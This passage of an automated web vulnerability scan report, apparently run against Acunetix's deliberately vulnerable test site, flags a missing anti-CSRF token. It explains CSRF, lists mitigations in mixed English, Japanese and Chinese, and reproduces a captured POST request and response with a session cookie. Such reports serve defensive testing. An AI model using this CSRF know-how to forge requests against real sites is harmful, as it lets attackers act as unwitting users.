          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        24. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (455 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
          Content-Length: 3761
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (3761 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLEirm5BAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2BL5%2FdFSm3qL6WSrtXoxMhBWz78mQ%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 17924
          
          
          Response body (17924 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGSaJVtdRqrIb4g8/ZtiayAG6OnQCA==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLyytPMBgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+8ZVr2gCWJCE5ixl1VDrXamngxrA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
